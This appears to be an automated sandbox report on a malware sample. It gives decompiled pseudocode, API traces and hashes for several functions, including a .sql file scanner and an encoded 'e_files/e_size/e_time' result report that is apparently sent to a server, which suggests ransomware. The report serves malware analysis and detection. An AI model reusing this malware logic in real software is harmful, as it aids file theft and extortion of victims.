                                        Uniqueness Score: -1.00%

                                        Function 0FC672B0 Relevance: 7.5, APIs: 5, Instructions: 47registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC672B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}






                                        0x0fc672c6
                                        0x0fc672d0
                                        0x0fc67324
                                        0x0fc672d2
                                        0x0fc672d5
                                        0x0fc672e7
                                        0x0fc672ef
                                        0x0fc67306
                                        0x0fc6730f
                                        0x0fc6731b
                                        0x0fc672f1
                                        0x0fc672f4
                                        0x0fc672f7
                                        0x0fc67303
                                        0x0fc67303
                                        0x0fc672ef

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672C6
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672E7
                                        • RegCloseKey.KERNEL32(?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672F7
                                        • GetLastError.KERNEL32(?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC67306
                                        • RegCloseKey.ADVAPI32(?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC6730F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: 450c02c57fe726ef800dc1276e54c68650b15d51085a526e550795c06b1d4c9e
                                        • Instruction ID: 738b1dd8bc4fb3b6d582d41d404c3dcee9ce50ac06f2428d3ce285b3d527adfe
                                        • Opcode Fuzzy Hash: 450c02c57fe726ef800dc1276e54c68650b15d51085a526e550795c06b1d4c9e
                                        • Instruction Fuzzy Hash: 6F01213260411EFBCB119F95ED0ADDA7B68EF04362B004162FE06E6111D7329A34ABE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62830 Relevance: 4.5, APIs: 3, Instructions: 40fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E0FC62830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}









                                        0x0fc62833
                                        0x0fc6284a
                                        0x0fc6284c
                                        0x0fc62852
                                        0x0fc62854
                                        0x0fc62859
                                        0x0fc6285d
                                        0x0fc62873
                                        0x0fc62873
                                        0x0fc6285f
                                        0x0fc62869
                                        0x0fc62871
                                        0x00000000
                                        0x00000000
                                        0x0fc62871
                                        0x0fc62879
                                        0x0fc62879
                                        0x0fc62887

                                        APIs
                                        • CreateFileW.KERNEL32(0FC62C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0FC62C02,?,0FC6293C,?), ref: 0FC6284C
                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0FC6293C,?,?,?,?,0FC62C02), ref: 0FC62869
                                        • FindCloseChangeNotification.KERNEL32(00000000,?,0FC6293C,?,?,?,?,0FC62C02), ref: 0FC62879
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                        • String ID:
                                        • API String ID: 3805958096-0
                                        • Opcode ID: d6b9075aa18aca64a68caf2099bcabaa7206e5a49b92f1d5ed01da755f188266
                                        • Instruction ID: 1d954437abb78c82dac965238082c647446484dbb11cbbc141316bd1bda5aabb
                                        • Opcode Fuzzy Hash: d6b9075aa18aca64a68caf2099bcabaa7206e5a49b92f1d5ed01da755f188266
                                        • Instruction Fuzzy Hash: 8AF0827330421477E6200A96AC8BFEBB65CD78ABA1F504225FF48A61C1D6A4AD1553A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64DE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC64DE0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				CHAR* _v12;
				long _v16;
				void _v4112;
				char* _t18;
				char* _t21;
				intOrPtr _t24;
				char _t26;
				void* _t31;
				void* _t33;
				void* _t38;

				E0FC68990(0x100c);
				_v8 = __edx;
				_v12 = __ecx;
				while(1) {
					L1:
					_t18 = ReadFile( *0xfc72a70,  &_v4112, 0x1000,  &_v16, 0); // executed
					_t24 = _v4112;
					_t33 =  &_v4112;
					_t21 = _t18;
					if(_t24 == 0) {
						break;
					}
					_t38 = _t33 - "Can\'t find server";
					do {
						_t18 = "Can\'t find server";
						if(_t24 == 0) {
							goto L9;
						} else {
							while(1) {
								_t26 =  *_t18;
								if(_t26 == 0) {
									goto L1;
								}
								_t31 =  *((char*)(_t38 + _t18)) - _t26;
								if(_t31 != 0) {
									L8:
									if( *_t18 == 0) {
										goto L1;
									} else {
										goto L9;
									}
								} else {
									_t18 =  &(_t18[1]);
									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
										continue;
									} else {
										goto L8;
									}
								}
								goto L10;
							}
							goto L1;
						}
						goto L10;
						L9:
						_t24 =  *((intOrPtr*)(_t33 + 1));
						_t33 = _t33 + 1;
						_t38 = _t38 + 1;
					} while (_t24 != 0);
					break;
				}
				L10:
				if(_t21 != 0 && _v16 != 0) {
					return E0FC64CD0( &_v4112, _v12, _v8);
				}
				return _t18;
			}














                                        0x0fc64de8
                                        0x0fc64def
                                        0x0fc64df2
                                        0x0fc64df6
                                        0x0fc64df6
                                        0x0fc64e0e
                                        0x0fc64e14
                                        0x0fc64e1a
                                        0x0fc64e20
                                        0x0fc64e24
                                        0x00000000
                                        0x00000000
                                        0x0fc64e28
                                        0x0fc64e30
                                        0x0fc64e30
                                        0x0fc64e37
                                        0x00000000
                                        0x0fc64e40
                                        0x0fc64e40
                                        0x0fc64e40
                                        0x0fc64e44
                                        0x00000000
                                        0x00000000
                                        0x0fc64e4d
                                        0x0fc64e4f
                                        0x0fc64e57
                                        0x0fc64e5a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64e51
                                        0x0fc64e51
                                        0x0fc64e55
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64e55
                                        0x00000000
                                        0x0fc64e4f
                                        0x00000000
                                        0x0fc64e40
                                        0x00000000
                                        0x0fc64e5c
                                        0x0fc64e5c
                                        0x0fc64e5f
                                        0x0fc64e60
                                        0x0fc64e61
                                        0x00000000
                                        0x0fc64e30
                                        0x0fc64e65
                                        0x0fc64e6a
                                        0x00000000
                                        0x0fc64e83
                                        0x0fc64e89

                                        APIs
                                        • ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,0FC65034), ref: 0FC64E0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: Can't find server
                                        • API String ID: 2738559852-1141070784
                                        • Opcode ID: 595f77427077f2574487bc2e06fcbe631f147002d58d0598b3deff59f72b7b99
                                        • Instruction ID: 2a86b3aecf0d197c3ece1c43e5e53e7ee1d7201483e119b63935c40f0ad95636
                                        • Opcode Fuzzy Hash: 595f77427077f2574487bc2e06fcbe631f147002d58d0598b3deff59f72b7b99
                                        • Instruction Fuzzy Hash: DC115734C0C3999BEF3ACA5498827EAFBB8DF46306F5481D5E98457202E2702A48C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64BF0 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0FC64950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}







                                        0x0fc64bf6
                                        0x0fc64c00
                                        0x0fc64c1c
                                        0x0fc64c22
                                        0x0fc64c29
                                        0x0fc64c2f
                                        0x0fc64c2f
                                        0x0fc64c3b

                                        APIs
                                        • CreateThread.KERNEL32 ref: 0FC64C1C
                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 0FC64C2F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: dd1c34557227a3e2831751e60c876fecc9c552793ed57b32feebebfa4348e95b
                                        • Instruction ID: b4acaa697bbbeade9d818412415d0a0127b6b487d9ef365b9b0b0a8ee5e9b581
                                        • Opcode Fuzzy Hash: dd1c34557227a3e2831751e60c876fecc9c552793ed57b32feebebfa4348e95b
                                        • Instruction Fuzzy Hash: B3F03934A48308FBD714DFA1D84AB8CB774EB04706F20809AEA017B2C0C6B56650DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66420 Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E0FC66420(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0FC662B0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}







                                        0x0fc66423
                                        0x0fc66424
                                        0x0fc66435
                                        0x0fc6643e
                                        0x0fc6644f
                                        0x0fc66458
                                        0x0fc6645d
                                        0x0fc66467
                                        0x0fc66485
                                        0x0fc66489
                                        0x0fc66493
                                        0x0fc66498
                                        0x0fc66498
                                        0x0fc664a2
                                        0x0fc664af

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0FC649CE), ref: 0FC66435
                                        • VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0FC649CE), ref: 0FC6644F
                                          • Part of subcall function 0FC662B0: CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FC649C6,?,0FC649CE), ref: 0FC662C5
                                          • Part of subcall function 0FC662B0: GetLastError.KERNEL32(?,0FC649CE), ref: 0FC662CF
                                          • Part of subcall function 0FC662B0: CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC649CE), ref: 0FC662EB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                        • String ID:
                                        • API String ID: 3824161113-0
                                        • Opcode ID: 1d416f63c6849ff95af3cd453477913b41bfb01b7c4597601f98bea678b641bb
                                        • Instruction ID: 95436e4d3c6d86c84ba86a1453da4c084fe842431e36840d748da6dc578e252a
                                        • Opcode Fuzzy Hash: 1d416f63c6849ff95af3cd453477913b41bfb01b7c4597601f98bea678b641bb
                                        • Instruction Fuzzy Hash: CD11DB74A44208EFD704CF94DA55F99B7F5EF88709F208188EA05AB381D7B5AF109B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0FC66A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136stringfilememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC66A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FC68100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FC669E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}



















                                        0x0fc66a4b
                                        0x0fc66a4f
                                        0x0fc66a5e
                                        0x0fc66a61
                                        0x0fc66a64
                                        0x0fc66a7e
                                        0x0fc66a83
                                        0x0fc66a86
                                        0x0fc66a90
                                        0x0fc66aa0
                                        0x00000000
                                        0x0fc66abc
                                        0x0fc66ac4
                                        0x0fc66acb
                                        0x0fc66ad1
                                        0x0fc66ad4
                                        0x0fc66ad9
                                        0x0fc66ba8
                                        0x0fc66ba8
                                        0x00000000
                                        0x0fc66ae0
                                        0x0fc66ae0
                                        0x0fc66ae6
                                        0x0fc66ae9
                                        0x0fc66aea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc66aea
                                        0x0fc66aee
                                        0x00000000
                                        0x0fc66af4
                                        0x0fc66afa
                                        0x0fc66afe
                                        0x00000000
                                        0x0fc66b04
                                        0x0fc66b17
                                        0x0fc66b22
                                        0x0fc66b26
                                        0x0fc66b2f
                                        0x0fc66b40
                                        0x0fc66b44
                                        0x0fc66b57
                                        0x0fc66b6e
                                        0x0fc66b74
                                        0x0fc66b7e
                                        0x0fc66b7e
                                        0x0fc66b89
                                        0x0fc66b89
                                        0x0fc66b8f
                                        0x0fc66b8f
                                        0x0fc66b93
                                        0x0fc66b99
                                        0x0fc66b9e
                                        0x0fc66baa
                                        0x0fc66baf
                                        0x00000000
                                        0x0fc66baf
                                        0x0fc66b9e
                                        0x0fc66afe
                                        0x0fc66aee
                                        0x0fc66ad9
                                        0x00000000
                                        0x0fc66bb2
                                        0x0fc66bc2
                                        0x0fc66bcd
                                        0x0fc66bdb

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66A52
                                        • lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66A72
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66A9C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0FC66ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FC66AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FC66B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FC66B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FC66B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FC66B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0FC66B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0FC66B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0FC66BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0FC66BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: f1d5b3f461bc443fba13900eed3315c664bf7c207916a93e065b89a4d1bfb2f3
                                        • Instruction ID: 7d7ce6bf5b5ee2fa1681e6465f46bddf48963fe31a720c6db872f707ed0f5404
                                        • Opcode Fuzzy Hash: f1d5b3f461bc443fba13900eed3315c664bf7c207916a93e065b89a4d1bfb2f3
                                        • Instruction Fuzzy Hash: 5A418671608216EBDB109F659C8BFAE76ACEF44711F404069FA02F6141EB74AA11DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169stringmemoryencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			E0FC65670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0FC639F0( &_v180);
				E0FC67330( &_v180, _t88);
				E0FC67140( &_v180);
				E0FC66F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xfc6fc78]");
				_v28 = _t79;
				_t80 =  *0xfc6fc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xfc6fc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0FC69010( &_v435, 0, 0xff);
				E0FC65D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0FC65E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0FC654A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FC67C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}
































                                        0x0fc65670
                                        0x0fc65670
                                        0x0fc6568a
                                        0x0fc6568c
                                        0x0fc6568f
                                        0x0fc65695
                                        0x0fc6569a
                                        0x0fc656a6
                                        0x0fc656a8
                                        0x0fc6569c
                                        0x0fc6569c
                                        0x0fc6569c
                                        0x0fc656a2
                                        0x0fc656a2
                                        0x0fc656aa
                                        0x0fc656ae
                                        0x0fc656bd
                                        0x0fc656c6
                                        0x0fc656c8
                                        0x0fc656c9
                                        0x0fc656ce
                                        0x0fc656d0
                                        0x0fc656d1
                                        0x0fc656d3
                                        0x0fc656d4
                                        0x0fc656d6
                                        0x0fc656d7
                                        0x0fc656d9
                                        0x0fc656da
                                        0x0fc656df
                                        0x0fc656e1
                                        0x0fc656e2
                                        0x0fc656ea
                                        0x0fc656f5
                                        0x0fc65700
                                        0x0fc65718
                                        0x0fc6571e
                                        0x0fc65720
                                        0x0fc65726
                                        0x0fc65728
                                        0x0fc65736
                                        0x0fc65739
                                        0x0fc65745
                                        0x0fc65749
                                        0x0fc65752
                                        0x0fc65757
                                        0x0fc6575a
                                        0x0fc65761
                                        0x0fc6577d
                                        0x0fc65785
                                        0x0fc65792
                                        0x0fc657a1
                                        0x0fc657ba
                                        0x0fc657bc
                                        0x0fc657bc
                                        0x0fc657d2
                                        0x0fc657d2
                                        0x0fc657df
                                        0x0fc657e2
                                        0x0fc657e4
                                        0x0fc657e7
                                        0x0fc657ec
                                        0x0fc657f5
                                        0x0fc657f5
                                        0x0fc657ee
                                        0x0fc657ee
                                        0x0fc657f3
                                        0x00000000
                                        0x00000000
                                        0x0fc657f3
                                        0x0fc657fd
                                        0x0fc65803
                                        0x0fc65805
                                        0x0fc65808
                                        0x0fc65808
                                        0x0fc6580d
                                        0x0fc65813
                                        0x0fc65815
                                        0x0fc65815
                                        0x0fc65817
                                        0x0fc6581e
                                        0x0fc65808
                                        0x0fc65829
                                        0x0fc65843
                                        0x0fc65850
                                        0x0fc65858
                                        0x0fc65867
                                        0x0fc6586b
                                        0x0fc65871

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FC6568F
                                        • wsprintfW.USER32 ref: 0FC656BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FC6570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FC6571E
                                        • _memset.LIBCMT ref: 0FC65761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0FC6576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0FC657B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657E2
